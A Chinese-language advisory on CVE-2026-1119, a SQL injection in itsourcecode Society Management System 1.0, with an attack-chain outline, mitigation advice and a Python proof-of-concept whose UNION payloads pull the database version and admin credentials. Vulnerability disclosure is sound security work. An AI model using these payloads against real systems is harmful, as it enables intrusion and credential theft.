CVE-2026-1119 itsourcecode Society Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1119

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Society Management System 1.0

漏洞概述

CVE-2026-1119是itsourcecode公司开发的Society Management System（社会管理系统）1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于管理后台的/admin/delete_activity.php文件中，由于对用户输入的activity_id参数未进行充分的输入验证和过滤，攻击者可以通过构造恶意的SQL语句实现数据库注入攻击。 Society Management System通常用于管理社会团体、组织或社区的日常运营活动，包含活动管理、成员管理、数据统计等功能模块。由于该系统主要面向组织和机构使用，一旦被攻击者利用，可能导致以下严重后果：1）未经授权访问数据库中的敏感信息，包括成员个人资料、活动记录、财务数据等；2）修改或删除数据库中的关键数据，影响系统正常运行；3）进一步利用数据库权限执行系统命令，实现服务器权限提升；4）造成数据泄露，违反相关法律法规和隐私保护要求。该漏洞的CVSS评分为7.3，属于高危级别，攻击复杂度低，无需认证即可远程利用，对系统的机密性、完整性和可用性均造成一定影响。

技术细节

该SQL注入漏洞存在于itsourcecode Society Management System 1.0的/admin/delete_activity.php文件中的delete_activity功能模块。漏洞的根本原因在于程序对传入的activity_id参数缺乏有效的SQL注入防护机制。具体利用过程如下：攻击者通过HTTP请求向目标系统的/admin/delete_activity.php文件发送带有恶意SQL payload的activity_id参数。该参数值未经任何过滤或参数化处理，直接被拼接到SQL查询语句中执行。例如，攻击者可以使用UNION SELECT、布尔盲注、时间盲注或堆叠查询等技术来提取数据库中的敏感信息。常见的SQL注入payload包括：1）使用单引号触发SQL语法错误以确认漏洞存在；2）使用UNION查询从其他表（如users、admin）中提取用户名和密码哈希值；3）使用BENCHMARK或SLEEP函数进行基于时间的数据提取；4）使用OUTFILE或INTO OUTFILE将恶意代码写入服务器文件系统。由于该漏洞无需认证即可利用（PR:N），攻击者可以直接访问管理后台的文件路径，这大大增加了漏洞被利用的风险。攻击成功后，攻击者可以获取数据库管理员权限，进而控制整个应用系统。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先确认目标网站使用itsourcecode Society Management System 1.0，通过指纹识别或目录扫描发现/admin/delete_activity.php文件存在

STEP 2

步骤2

漏洞探测：攻击者向/admin/delete_activity.php发送带有单引号的activity_id参数（如1'），观察返回结果以确认SQL注入漏洞存在

STEP 3

步骤3

注入技术选择：根据目标数据库类型和防护情况，选择合适的注入技术（UNION注入、布尔盲注或时间盲注）

STEP 4

步骤4

数据库枚举：使用SQL注入payload获取数据库版本、数据库名称、表名等元数据信息

STEP 5

步骤5

敏感数据提取：通过UNION查询或盲注技术从admin、users等表中提取用户名、密码哈希等敏感凭据

STEP 6

步骤6

权限提升：利用获取的管理员账号登录后台系统，进一步获取服务器操作系统权限或植入webshell

STEP 7

步骤7

持久化控制：在成功入侵后，攻击者可能创建后门账户、修改数据库记录或植入恶意代码以维持持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1119 SQL Injection PoC
# Target: itsourcecode Society Management System 1.0
# File: /admin/delete_activity.php
# Parameter: activity_id

def test_sql_injection(base_url):
    """
    Test for SQL injection vulnerability in delete_activity.php
    """
    target_url = f"{base_url}/admin/delete_activity.php"
    
    # Payload 1: Basic injection test - trigger SQL error
    payload_error = "1'"
    
    # Payload 2: Boolean-based blind injection
    payload_boolean = "1 AND 1=1"
    payload_boolean_false = "1 AND 1=2"
    
    # Payload 3: Union-based injection to extract database version
    payload_union = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -"
    
    # Payload 4: Extract admin credentials
    payload_creds = "1' UNION SELECT NULL,username,password,NULL,NULL FROM admin LIMIT 0,1-- -"
    
    print(f"[*] Testing SQL Injection on: {target_url}")
    print(f"[*] Target: {base_url}")
    
    # Test 1: Basic error-based injection
    print("\n[1] Testing error-based injection...")
    params = {"activity_id": payload_error}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print("[+] Potential SQL injection detected!")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    # Test 2: Boolean-based blind injection
    print("\n[2] Testing boolean-based blind injection...")
    params_true = {"activity_id": payload_boolean}
    params_false = {"activity_id": payload_boolean_false}
    
    try:
        resp_true = requests.get(target_url, params=params_true, timeout=10)
        resp_false = requests.get(target_url, params=params_false, timeout=10)
        
        if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text):
            print("[+] Boolean-based injection confirmed!")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    # Test 3: Union-based injection
    print("\n[3] Testing union-based injection...")
    params_union = {"activity_id": payload_union}
    try:
        response = requests.get(target_url, params=params_union, timeout=10)
        if "5." in response.text or "MariaDB" in response.text or "MySQL" in response.text:
            print("[+] Union-based injection successful - Database version extracted!")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    print("\n[*] PoC completed. Manual verification recommended.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    test_sql_injection(base_url)

影响范围

itsourcecode Society Management System 1.0

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）立即限制对/admin/delete_activity.php文件的访问权限，仅允许授权管理员IP访问；2）使用Web应用防火墙规则临时拦截包含单引号、UNION、SELECT等SQL关键字的请求；3）暂时禁用delete_activity功能或设置IP白名单限制；4）部署入侵检测系统监控针对该漏洞的扫描和利用行为；5）加强对数据库和应用程序的日志审计，及时发现异常访问；6）考虑使用虚拟补丁技术，在应用层拦截恶意请求。建议尽快联系itsourcecode官方获取安全更新，并在测试环境中验证修复方案后再部署生产环境。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1119
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1119
3 Details https://www.cvedetails.com/cve/CVE-2026-1119/
4 VulDB https://vuldb.com/cve/CVE-2026-1119
5 Link https://github.com/AriazzzZ/CVE/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.341711
8 Link https://vuldb.com/?id.341711
9 Link https://vuldb.com/?submit.734290